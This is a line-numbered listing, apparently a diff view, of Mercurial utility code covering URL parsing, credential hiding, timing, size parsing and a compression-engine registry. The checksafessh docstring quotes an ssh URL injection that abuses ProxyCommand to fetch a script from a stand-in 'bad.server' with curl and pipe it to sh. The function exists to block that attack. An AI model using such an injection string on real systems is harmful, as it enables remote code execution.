2778 self.user, self.host = self.host.rsplit('@', 1)
2778 if ':' in self.user:
2779 if ':' in self.user:
2779 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2780 if not self.host:
2781 if not self.host:
2781 self.host = None
2782 self.host = None
2782
2783
2783 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2784 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
2785 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 self._hostport = self.host
2787 self._hostport = self.host
2787 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2788 if not self.host:
2789 if not self.host:
2789 self.host = None
2790 self.host = None
2790
2791
2791 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2792 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794
2795
2795 self.path = path
2796 self.path = path
2796
2797
2797 # leave the query string escaped
2798 # leave the query string escaped
2798 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2799 'path', 'fragment'):
2800 'path', 'fragment'):
2800 v = getattr(self, a)
2801 v = getattr(self, a)
2801 if v is not None:
2802 if v is not None:
2802 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2803
2804
2804 @encoding.strmethod
2805 @encoding.strmethod
2805 def __repr__(self):
2806 def __repr__(self):
2806 attrs = []
2807 attrs = []
2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 'query', 'fragment'):
2809 'query', 'fragment'):
2809 v = getattr(self, a)
2810 v = getattr(self, a)
2810 if v is not None:
2811 if v is not None:
2811 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 return '<url %s>' % ', '.join(attrs)
2813 return '<url %s>' % ', '.join(attrs)
2813
2814
2814 def __bytes__(self):
2815 def __bytes__(self):
2815 r"""Join the URL's components back into a URL string.
2816 r"""Join the URL's components back into a URL string.
2816
2817
2817 Examples:
2818 Examples:
2818
2819
2819 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 'http://user:pw@host:80/?foo=bar&baz=42'
2823 'http://user:pw@host:80/?foo=bar&baz=42'
2823 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 'ssh://user:pw@[::1]:2200//home/joe#'
2827 'ssh://user:pw@[::1]:2200//home/joe#'
2827 >>> bytes(url(b'http://localhost:80//'))
2828 >>> bytes(url(b'http://localhost:80//'))
2828 'http://localhost:80//'
2829 'http://localhost:80//'
2829 >>> bytes(url(b'http://localhost:80/'))
2830 >>> bytes(url(b'http://localhost:80/'))
2830 'http://localhost:80/'
2831 'http://localhost:80/'
2831 >>> bytes(url(b'http://localhost:80'))
2832 >>> bytes(url(b'http://localhost:80'))
2832 'http://localhost:80/'
2833 'http://localhost:80/'
2833 >>> bytes(url(b'bundle:foo'))
2834 >>> bytes(url(b'bundle:foo'))
2834 'bundle:foo'
2835 'bundle:foo'
2835 >>> bytes(url(b'bundle://../foo'))
2836 >>> bytes(url(b'bundle://../foo'))
2836 'bundle:../foo'
2837 'bundle:../foo'
2837 >>> bytes(url(b'path'))
2838 >>> bytes(url(b'path'))
2838 'path'
2839 'path'
2839 >>> bytes(url(b'file:///tmp/foo/bar'))
2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2840 'file:///tmp/foo/bar'
2841 'file:///tmp/foo/bar'
2841 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2842 'file:///c:/tmp/foo/bar'
2843 'file:///c:/tmp/foo/bar'
2843 >>> print(url(br'bundle:foo\bar'))
2844 >>> print(url(br'bundle:foo\bar'))
2844 bundle:foo\bar
2845 bundle:foo\bar
2845 >>> print(url(br'file:///D:\data\hg'))
2846 >>> print(url(br'file:///D:\data\hg'))
2846 file:///D:\data\hg
2847 file:///D:\data\hg
2847 """
2848 """
2848 if self._localpath:
2849 if self._localpath:
2849 s = self.path
2850 s = self.path
2850 if self.scheme == 'bundle':
2851 if self.scheme == 'bundle':
2851 s = 'bundle:' + s
2852 s = 'bundle:' + s
2852 if self.fragment:
2853 if self.fragment:
2853 s += '#' + self.fragment
2854 s += '#' + self.fragment
2854 return s
2855 return s
2855
2856
2856 s = self.scheme + ':'
2857 s = self.scheme + ':'
2857 if self.user or self.passwd or self.host:
2858 if self.user or self.passwd or self.host:
2858 s += '//'
2859 s += '//'
2859 elif self.scheme and (not self.path or self.path.startswith('/')
2860 elif self.scheme and (not self.path or self.path.startswith('/')
2860 or hasdriveletter(self.path)):
2861 or hasdriveletter(self.path)):
2861 s += '//'
2862 s += '//'
2862 if hasdriveletter(self.path):
2863 if hasdriveletter(self.path):
2863 s += '/'
2864 s += '/'
2864 if self.user:
2865 if self.user:
2865 s += urlreq.quote(self.user, safe=self._safechars)
2866 s += urlreq.quote(self.user, safe=self._safechars)
2866 if self.passwd:
2867 if self.passwd:
2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 if self.user or self.passwd:
2869 if self.user or self.passwd:
2869 s += '@'
2870 s += '@'
2870 if self.host:
2871 if self.host:
2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 s += urlreq.quote(self.host)
2873 s += urlreq.quote(self.host)
2873 else:
2874 else:
2874 s += self.host
2875 s += self.host
2875 if self.port:
2876 if self.port:
2876 s += ':' + urlreq.quote(self.port)
2877 s += ':' + urlreq.quote(self.port)
2877 if self.host:
2878 if self.host:
2878 s += '/'
2879 s += '/'
2879 if self.path:
2880 if self.path:
2880 # TODO: similar to the query string, we should not unescape the
2881 # TODO: similar to the query string, we should not unescape the
2881 # path when we store it, the path might contain '%2f' = '/',
2882 # path when we store it, the path might contain '%2f' = '/',
2882 # which we should *not* escape.
2883 # which we should *not* escape.
2883 s += urlreq.quote(self.path, safe=self._safepchars)
2884 s += urlreq.quote(self.path, safe=self._safepchars)
2884 if self.query:
2885 if self.query:
2885 # we store the query in escaped form.
2886 # we store the query in escaped form.
2886 s += '?' + self.query
2887 s += '?' + self.query
2887 if self.fragment is not None:
2888 if self.fragment is not None:
2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 return s
2890 return s
2890
2891
2891 __str__ = encoding.strmethod(__bytes__)
2892 __str__ = encoding.strmethod(__bytes__)
2892
2893
2893 def authinfo(self):
2894 def authinfo(self):
2894 user, passwd = self.user, self.passwd
2895 user, passwd = self.user, self.passwd
2895 try:
2896 try:
2896 self.user, self.passwd = None, None
2897 self.user, self.passwd = None, None
2897 s = bytes(self)
2898 s = bytes(self)
2898 finally:
2899 finally:
2899 self.user, self.passwd = user, passwd
2900 self.user, self.passwd = user, passwd
2900 if not self.user:
2901 if not self.user:
2901 return (s, None)
2902 return (s, None)
2902 # authinfo[1] is passed to urllib2 password manager, and its
2903 # authinfo[1] is passed to urllib2 password manager, and its
2903 # URIs must not contain credentials. The host is passed in the
2904 # URIs must not contain credentials. The host is passed in the
2904 # URIs list because Python < 2.4.3 uses only that to search for
2905 # URIs list because Python < 2.4.3 uses only that to search for
2905 # a password.
2906 # a password.
2906 return (s, (None, (s, self.host),
2907 return (s, (None, (s, self.host),
2907 self.user, self.passwd or ''))
2908 self.user, self.passwd or ''))
2908
2909
2909 def isabs(self):
2910 def isabs(self):
2910 if self.scheme and self.scheme != 'file':
2911 if self.scheme and self.scheme != 'file':
2911 return True # remote URL
2912 return True # remote URL
2912 if hasdriveletter(self.path):
2913 if hasdriveletter(self.path):
2913 return True # absolute for our purposes - can't be joined()
2914 return True # absolute for our purposes - can't be joined()
2914 if self.path.startswith(br'\\'):
2915 if self.path.startswith(br'\\'):
2915 return True # Windows UNC path
2916 return True # Windows UNC path
2916 if self.path.startswith('/'):
2917 if self.path.startswith('/'):
2917 return True # POSIX-style
2918 return True # POSIX-style
2918 return False
2919 return False
2919
2920
2920 def localpath(self):
2921 def localpath(self):
2921 if self.scheme == 'file' or self.scheme == 'bundle':
2922 if self.scheme == 'file' or self.scheme == 'bundle':
2922 path = self.path or '/'
2923 path = self.path or '/'
2923 # For Windows, we need to promote hosts containing drive
2924 # For Windows, we need to promote hosts containing drive
2924 # letters to paths with drive letters.
2925 # letters to paths with drive letters.
2925 if hasdriveletter(self._hostport):
2926 if hasdriveletter(self._hostport):
2926 path = self._hostport + '/' + self.path
2927 path = self._hostport + '/' + self.path
2927 elif (self.host is not None and self.path
2928 elif (self.host is not None and self.path
2928 and not hasdriveletter(path)):
2929 and not hasdriveletter(path)):
2929 path = '/' + path
2930 path = '/' + path
2930 return path
2931 return path
2931 return self._origpath
2932 return self._origpath
2932
2933
2933 def islocal(self):
2934 def islocal(self):
2934 '''whether localpath will return something that posixfile can open'''
2935 '''whether localpath will return something that posixfile can open'''
2935 return (not self.scheme or self.scheme == 'file'
2936 return (not self.scheme or self.scheme == 'file'
2936 or self.scheme == 'bundle')
2937 or self.scheme == 'bundle')
2937
2938
2938 def hasscheme(path):
2939 def hasscheme(path):
2939 return bool(url(path).scheme)
2940 return bool(url(path).scheme)
2940
2941
2941 def hasdriveletter(path):
2942 def hasdriveletter(path):
2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2943
2944
2944 def urllocalpath(path):
2945 def urllocalpath(path):
2945 return url(path, parsequery=False, parsefragment=False).localpath()
2946 return url(path, parsequery=False, parsefragment=False).localpath()
2946
2947
2947 def checksafessh(path):
2948 def checksafessh(path):
2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949
2950
2950 This is a sanity check for ssh urls. ssh will parse the first item as
2951 This is a sanity check for ssh urls. ssh will parse the first item as
2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 Let's prevent these potentially exploited urls entirely and warn the
2953 Let's prevent these potentially exploited urls entirely and warn the
2953 user.
2954 user.
2954
2955
2955 Raises an error.Abort when the url is unsafe.
2956 Raises an error.Abort when the url is unsafe.
2956 """
2957 """
2957 path = urlreq.unquote(path)
2958 path = urlreq.unquote(path)
2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 raise error.Abort(_('potentially unsafe url: %r') %
2960 raise error.Abort(_('potentially unsafe url: %r') %
2960 (pycompat.bytestr(path),))
2961 (pycompat.bytestr(path),))
2961
2962
2962 def hidepassword(u):
2963 def hidepassword(u):
2963 '''hide user credential in a url string'''
2964 '''hide user credential in a url string'''
2964 u = url(u)
2965 u = url(u)
2965 if u.passwd:
2966 if u.passwd:
2966 u.passwd = '***'
2967 u.passwd = '***'
2967 return bytes(u)
2968 return bytes(u)
2968
2969
2969 def removeauth(u):
2970 def removeauth(u):
2970 '''remove all authentication information from a url string'''
2971 '''remove all authentication information from a url string'''
2971 u = url(u)
2972 u = url(u)
2972 u.user = u.passwd = None
2973 u.user = u.passwd = None
2973 return bytes(u)
2974 return bytes(u)
2974
2975
2975 timecount = unitcountfn(
2976 timecount = unitcountfn(
2976 (1, 1e3, _('%.0f s')),
2977 (1, 1e3, _('%.0f s')),
2977 (100, 1, _('%.1f s')),
2978 (100, 1, _('%.1f s')),
2978 (10, 1, _('%.2f s')),
2979 (10, 1, _('%.2f s')),
2979 (1, 1, _('%.3f s')),
2980 (1, 1, _('%.3f s')),
2980 (100, 0.001, _('%.1f ms')),
2981 (100, 0.001, _('%.1f ms')),
2981 (10, 0.001, _('%.2f ms')),
2982 (10, 0.001, _('%.2f ms')),
2982 (1, 0.001, _('%.3f ms')),
2983 (1, 0.001, _('%.3f ms')),
2983 (100, 0.000001, _('%.1f us')),
2984 (100, 0.000001, _('%.1f us')),
2984 (10, 0.000001, _('%.2f us')),
2985 (10, 0.000001, _('%.2f us')),
2985 (1, 0.000001, _('%.3f us')),
2986 (1, 0.000001, _('%.3f us')),
2986 (100, 0.000000001, _('%.1f ns')),
2987 (100, 0.000000001, _('%.1f ns')),
2987 (10, 0.000000001, _('%.2f ns')),
2988 (10, 0.000000001, _('%.2f ns')),
2988 (1, 0.000000001, _('%.3f ns')),
2989 (1, 0.000000001, _('%.3f ns')),
2989 )
2990 )
2990
2991
2991 @attr.s
2992 @attr.s
2992 class timedcmstats(object):
2993 class timedcmstats(object):
2993 """Stats information produced by the timedcm context manager on entering."""
2994 """Stats information produced by the timedcm context manager on entering."""
2994
2995
2995 # the starting value of the timer as a float (meaning and resulution is
2996 # the starting value of the timer as a float (meaning and resulution is
2996 # platform dependent, see util.timer)
2997 # platform dependent, see util.timer)
2997 start = attr.ib(default=attr.Factory(lambda: timer()))
2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2998 # the number of seconds as a floating point value; starts at 0, updated when
2999 # the number of seconds as a floating point value; starts at 0, updated when
2999 # the context is exited.
3000 # the context is exited.
3000 elapsed = attr.ib(default=0)
3001 elapsed = attr.ib(default=0)
3001 # the number of nested timedcm context managers.
3002 # the number of nested timedcm context managers.
3002 level = attr.ib(default=1)
3003 level = attr.ib(default=1)
3003
3004
3004 def __bytes__(self):
3005 def __bytes__(self):
3005 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3006
3007
3007 __str__ = encoding.strmethod(__bytes__)
3008 __str__ = encoding.strmethod(__bytes__)
3008
3009
3009 @contextlib.contextmanager
3010 @contextlib.contextmanager
3010 def timedcm(whencefmt, *whenceargs):
3011 def timedcm(whencefmt, *whenceargs):
3011 """A context manager that produces timing information for a given context.
3012 """A context manager that produces timing information for a given context.
3012
3013
3013 On entering a timedcmstats instance is produced.
3014 On entering a timedcmstats instance is produced.
3014
3015
3015 This context manager is reentrant.
3016 This context manager is reentrant.
3016
3017
3017 """
3018 """
3018 # track nested context managers
3019 # track nested context managers
3019 timedcm._nested += 1
3020 timedcm._nested += 1
3020 timing_stats = timedcmstats(level=timedcm._nested)
3021 timing_stats = timedcmstats(level=timedcm._nested)
3021 try:
3022 try:
3022 with tracing.log(whencefmt, *whenceargs):
3023 with tracing.log(whencefmt, *whenceargs):
3023 yield timing_stats
3024 yield timing_stats
3024 finally:
3025 finally:
3025 timing_stats.elapsed = timer() - timing_stats.start
3026 timing_stats.elapsed = timer() - timing_stats.start
3026 timedcm._nested -= 1
3027 timedcm._nested -= 1
3027
3028
3028 timedcm._nested = 0
3029 timedcm._nested = 0
3029
3030
3030 def timed(func):
3031 def timed(func):
3031 '''Report the execution time of a function call to stderr.
3032 '''Report the execution time of a function call to stderr.
3032
3033
3033 During development, use as a decorator when you need to measure
3034 During development, use as a decorator when you need to measure
3034 the cost of a function, e.g. as follows:
3035 the cost of a function, e.g. as follows:
3035
3036
3036 @util.timed
3037 @util.timed
3037 def foo(a, b, c):
3038 def foo(a, b, c):
3038 pass
3039 pass
3039 '''
3040 '''
3040
3041
3041 def wrapper(*args, **kwargs):
3042 def wrapper(*args, **kwargs):
3042 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3043 result = func(*args, **kwargs)
3044 result = func(*args, **kwargs)
3044 stderr = procutil.stderr
3045 stderr = procutil.stderr
3045 stderr.write('%s%s: %s\n' % (
3046 stderr.write('%s%s: %s\n' % (
3046 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3047 time_stats))
3048 time_stats))
3048 return result
3049 return result
3049 return wrapper
3050 return wrapper
3050
3051
3051 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3052 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3053
3054
3054 def sizetoint(s):
3055 def sizetoint(s):
3055 '''Convert a space specifier to a byte count.
3056 '''Convert a space specifier to a byte count.
3056
3057
3057 >>> sizetoint(b'30')
3058 >>> sizetoint(b'30')
3058 30
3059 30
3059 >>> sizetoint(b'2.2kb')
3060 >>> sizetoint(b'2.2kb')
3060 2252
3061 2252
3061 >>> sizetoint(b'6M')
3062 >>> sizetoint(b'6M')
3062 6291456
3063 6291456
3063 '''
3064 '''
3064 t = s.strip().lower()
3065 t = s.strip().lower()
3065 try:
3066 try:
3066 for k, u in _sizeunits:
3067 for k, u in _sizeunits:
3067 if t.endswith(k):
3068 if t.endswith(k):
3068 return int(float(t[:-len(k)]) * u)
3069 return int(float(t[:-len(k)]) * u)
3069 return int(t)
3070 return int(t)
3070 except ValueError:
3071 except ValueError:
3071 raise error.ParseError(_("couldn't parse size: %s") % s)
3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3072
3073
3073 class hooks(object):
3074 class hooks(object):
3074 '''A collection of hook functions that can be used to extend a
3075 '''A collection of hook functions that can be used to extend a
3075 function's behavior. Hooks are called in lexicographic order,
3076 function's behavior. Hooks are called in lexicographic order,
3076 based on the names of their sources.'''
3077 based on the names of their sources.'''
3077
3078
3078 def __init__(self):
3079 def __init__(self):
3079 self._hooks = []
3080 self._hooks = []
3080
3081
3081 def add(self, source, hook):
3082 def add(self, source, hook):
3082 self._hooks.append((source, hook))
3083 self._hooks.append((source, hook))
3083
3084
3084 def __call__(self, *args):
3085 def __call__(self, *args):
3085 self._hooks.sort(key=lambda x: x[0])
3086 self._hooks.sort(key=lambda x: x[0])
3086 results = []
3087 results = []
3087 for source, hook in self._hooks:
3088 for source, hook in self._hooks:
3088 results.append(hook(*args))
3089 results.append(hook(*args))
3089 return results
3090 return results
3090
3091
3091 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3092 '''Yields lines for a nicely formatted stacktrace.
3093 '''Yields lines for a nicely formatted stacktrace.
3093 Skips the 'skip' last entries, then return the last 'depth' entries.
3094 Skips the 'skip' last entries, then return the last 'depth' entries.
3094 Each file+linenumber is formatted according to fileline.
3095 Each file+linenumber is formatted according to fileline.
3095 Each line is formatted according to line.
3096 Each line is formatted according to line.
3096 If line is None, it yields:
3097 If line is None, it yields:
3097 length of longest filepath+line number,
3098 length of longest filepath+line number,
3098 filepath+linenumber,
3099 filepath+linenumber,
3099 function
3100 function
3100
3101
3101 Not be used in production code but very convenient while developing.
3102 Not be used in production code but very convenient while developing.
3102 '''
3103 '''
3103 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3104 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3105 ][-depth:]
3106 ][-depth:]
3106 if entries:
3107 if entries:
3107 fnmax = max(len(entry[0]) for entry in entries)
3108 fnmax = max(len(entry[0]) for entry in entries)
3108 for fnln, func in entries:
3109 for fnln, func in entries:
3109 if line is None:
3110 if line is None:
3110 yield (fnmax, fnln, func)
3111 yield (fnmax, fnln, func)
3111 else:
3112 else:
3112 yield line % (fnmax, fnln, func)
3113 yield line % (fnmax, fnln, func)
3113
3114
3114 def debugstacktrace(msg='stacktrace', skip=0,
3115 def debugstacktrace(msg='stacktrace', skip=0,
3115 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3116 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3117 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3118 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3118 By default it will flush stdout first.
3119 By default it will flush stdout first.
3119 It can be used everywhere and intentionally does not require an ui object.
3120 It can be used everywhere and intentionally does not require an ui object.
3120 Not be used in production code but very convenient while developing.
3121 Not be used in production code but very convenient while developing.
3121 '''
3122 '''
3122 if otherf:
3123 if otherf:
3123 otherf.flush()
3124 otherf.flush()
3124 f.write('%s at:\n' % msg.rstrip())
3125 f.write('%s at:\n' % msg.rstrip())
3125 for line in getstackframes(skip + 1, depth=depth):
3126 for line in getstackframes(skip + 1, depth=depth):
3126 f.write(line)
3127 f.write(line)
3127 f.flush()
3128 f.flush()
3128
3129
3129 class dirs(object):
3130 class dirs(object):
3130 '''a multiset of directory names from a dirstate or manifest'''
3131 '''a multiset of directory names from a dirstate or manifest'''
3131
3132
3132 def __init__(self, map, skip=None):
3133 def __init__(self, map, skip=None):
3133 self._dirs = {}
3134 self._dirs = {}
3134 addpath = self.addpath
3135 addpath = self.addpath
3135 if safehasattr(map, 'iteritems') and skip is not None:
3136 if safehasattr(map, 'iteritems') and skip is not None:
3136 for f, s in map.iteritems():
3137 for f, s in map.iteritems():
3137 if s[0] != skip:
3138 if s[0] != skip:
3138 addpath(f)
3139 addpath(f)
3139 else:
3140 else:
3140 for f in map:
3141 for f in map:
3141 addpath(f)
3142 addpath(f)
3142
3143
3143 def addpath(self, path):
3144 def addpath(self, path):
3144 dirs = self._dirs
3145 dirs = self._dirs
3145 for base in finddirs(path):
3146 for base in finddirs(path):
3146 if base in dirs:
3147 if base in dirs:
3147 dirs[base] += 1
3148 dirs[base] += 1
3148 return
3149 return
3149 dirs[base] = 1
3150 dirs[base] = 1
3150
3151
3151 def delpath(self, path):
3152 def delpath(self, path):
3152 dirs = self._dirs
3153 dirs = self._dirs
3153 for base in finddirs(path):
3154 for base in finddirs(path):
3154 if dirs[base] > 1:
3155 if dirs[base] > 1:
3155 dirs[base] -= 1
3156 dirs[base] -= 1
3156 return
3157 return
3157 del dirs[base]
3158 del dirs[base]
3158
3159
3159 def __iter__(self):
3160 def __iter__(self):
3160 return iter(self._dirs)
3161 return iter(self._dirs)
3161
3162
3162 def __contains__(self, d):
3163 def __contains__(self, d):
3163 return d in self._dirs
3164 return d in self._dirs
3164
3165
3165 if safehasattr(parsers, 'dirs'):
3166 if safehasattr(parsers, 'dirs'):
3166 dirs = parsers.dirs
3167 dirs = parsers.dirs
3167
3168
3168 def finddirs(path):
3169 def finddirs(path):
3169 pos = path.rfind('/')
3170 pos = path.rfind('/')
3170 while pos != -1:
3171 while pos != -1:
3171 yield path[:pos]
3172 yield path[:pos]
3172 pos = path.rfind('/', 0, pos)
3173 pos = path.rfind('/', 0, pos)
3173
3174
3174 # compression code
3175 # compression code
3175
3176
3176 SERVERROLE = 'server'
3177 SERVERROLE = 'server'
3177 CLIENTROLE = 'client'
3178 CLIENTROLE = 'client'
3178
3179
3179 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3180 (u'name', u'serverpriority',
3181 (u'name', u'serverpriority',
3181 u'clientpriority'))
3182 u'clientpriority'))
3182
3183
3183 class compressormanager(object):
3184 class compressormanager(object):
3184 """Holds registrations of various compression engines.
3185 """Holds registrations of various compression engines.
3185
3186
3186 This class essentially abstracts the differences between compression
3187 This class essentially abstracts the differences between compression
3187 engines to allow new compression formats to be added easily, possibly from
3188 engines to allow new compression formats to be added easily, possibly from
3188 extensions.
3189 extensions.
3189
3190
3190 Compressors are registered against the global instance by calling its
3191 Compressors are registered against the global instance by calling its
3191 ``register()`` method.
3192 ``register()`` method.
3192 """
3193 """
3193 def __init__(self):
3194 def __init__(self):
3194 self._engines = {}
3195 self._engines = {}
3195 # Bundle spec human name to engine name.
3196 # Bundle spec human name to engine name.
3196 self._bundlenames = {}
3197 self._bundlenames = {}
3197 # Internal bundle identifier to engine name.
3198 # Internal bundle identifier to engine name.
3198 self._bundletypes = {}
3199 self._bundletypes = {}
3199 # Revlog header to engine name.
3200 # Revlog header to engine name.
3200 self._revlogheaders = {}
3201 self._revlogheaders = {}
3201 # Wire proto identifier to engine name.
3202 # Wire proto identifier to engine name.
3202 self._wiretypes = {}
3203 self._wiretypes = {}
3203
3204
3204 def __getitem__(self, key):
3205 def __getitem__(self, key):
3205 return self._engines[key]
3206 return self._engines[key]
3206
3207
3207 def __contains__(self, key):
3208 def __contains__(self, key):
3208 return key in self._engines
3209 return key in self._engines
3209
3210
3210 def __iter__(self):
3211 def __iter__(self):
3211 return iter(self._engines.keys())
3212 return iter(self._engines.keys())
3212
3213
3213 def register(self, engine):
3214 def register(self, engine):
3214 """Register a compression engine with the manager.
3215 """Register a compression engine with the manager.
3215
3216
3216 The argument must be a ``compressionengine`` instance.
3217 The argument must be a ``compressionengine`` instance.
3217 """
3218 """
3218 if not isinstance(engine, compressionengine):
3219 if not isinstance(engine, compressionengine):
3219 raise ValueError(_('argument must be a compressionengine'))
3220 raise ValueError(_('argument must be a compressionengine'))
3220
3221
3221 name = engine.name()
3222 name = engine.name()
3222
3223
3223 if name in self._engines:
3224 if name in self._engines:
3224 raise error.Abort(_('compression engine %s already registered') %
3225 raise error.Abort(_('compression engine %s already registered') %
3225 name)
3226 name)
3226
3227
3227 bundleinfo = engine.bundletype()
3228 bundleinfo = engine.bundletype()
3228 if bundleinfo:
3229 if bundleinfo:
3229 bundlename, bundletype = bundleinfo
3230 bundlename, bundletype = bundleinfo
3230
3231
3231 if bundlename in self._bundlenames:
3232 if bundlename in self._bundlenames:
3232 raise error.Abort(_('bundle name %s already registered') %
3233 raise error.Abort(_('bundle name %s already registered') %
3233 bundlename)
3234 bundlename)
3234 if bundletype in self._bundletypes:
3235 if bundletype in self._bundletypes:
3235 raise error.Abort(_('bundle type %s already registered by %s') %
3236 raise error.Abort(_('bundle type %s already registered by %s') %
3236 (bundletype, self._bundletypes[bundletype]))
3237 (bundletype, self._bundletypes[bundletype]))
3237
3238
3238 # No external facing name declared.
3239 # No external facing name declared.
3239 if bundlename:
3240 if bundlename:
3240 self._bundlenames[bundlename] = name
3241 self._bundlenames[bundlename] = name
3241
3242
3242 self._bundletypes[bundletype] = name
3243 self._bundletypes[bundletype] = name
3243
3244
3244 wiresupport = engine.wireprotosupport()
3245 wiresupport = engine.wireprotosupport()
3245 if wiresupport:
3246 if wiresupport:
3246 wiretype = wiresupport.name
3247 wiretype = wiresupport.name
3247 if wiretype in self._wiretypes:
3248 if wiretype in self._wiretypes:
3248 raise error.Abort(_('wire protocol compression %s already '
3249 raise error.Abort(_('wire protocol compression %s already '
3249 'registered by %s') %
3250 'registered by %s') %
3250 (wiretype, self._wiretypes[wiretype]))
3251 (wiretype, self._wiretypes[wiretype]))
3251
3252
3252 self._wiretypes[wiretype] = name
3253 self._wiretypes[wiretype] = name
3253
3254
3254 revlogheader = engine.revlogheader()
3255 revlogheader = engine.revlogheader()
3255 if revlogheader and revlogheader in self._revlogheaders:
3256 if revlogheader and revlogheader in self._revlogheaders:
3256 raise error.Abort(_('revlog header %s already registered by %s') %
3257 raise error.Abort(_('revlog header %s already registered by %s') %
3257 (revlogheader, self._revlogheaders[revlogheader]))
3258 (revlogheader, self._revlogheaders[revlogheader]))
3258
3259
3259 if revlogheader:
3260 if revlogheader:
3260 self._revlogheaders[revlogheader] = name
3261 self._revlogheaders[revlogheader] = name
3261
3262
3262 self._engines[name] = engine
3263 self._engines[name] = engine
3263
3264
3264 @property
3265 @property
3265 def supportedbundlenames(self):
3266 def supportedbundlenames(self):
3266 return set(self._bundlenames.keys())
3267 return set(self._bundlenames.keys())
3267
3268
3268 @property
3269 @property
3269 def supportedbundletypes(self):
3270 def supportedbundletypes(self):
3270 return set(self._bundletypes.keys())
3271 return set(self._bundletypes.keys())
3271
3272
3272 def forbundlename(self, bundlename):
3273 def forbundlename(self, bundlename):
3273 """Obtain a compression engine registered to a bundle name.
3274 """Obtain a compression engine registered to a bundle name.
3274
3275
3275 Will raise KeyError if the bundle type isn't registered.
3276 Will raise KeyError if the bundle type isn't registered.
3276
3277
3277 Will abort if the engine is known but not available.
3278 Will abort if the engine is known but not available.
3278 """
3279 """
3279 engine = self._engines[self._bundlenames[bundlename]]
3280 engine = self._engines[self._bundlenames[bundlename]]
3280 if not engine.available():
3281 if not engine.available():
3281 raise error.Abort(_('compression engine %s could not be loaded') %
3282 raise error.Abort(_('compression engine %s could not be loaded') %
3282 engine.name())
3283 engine.name())
3283 return engine
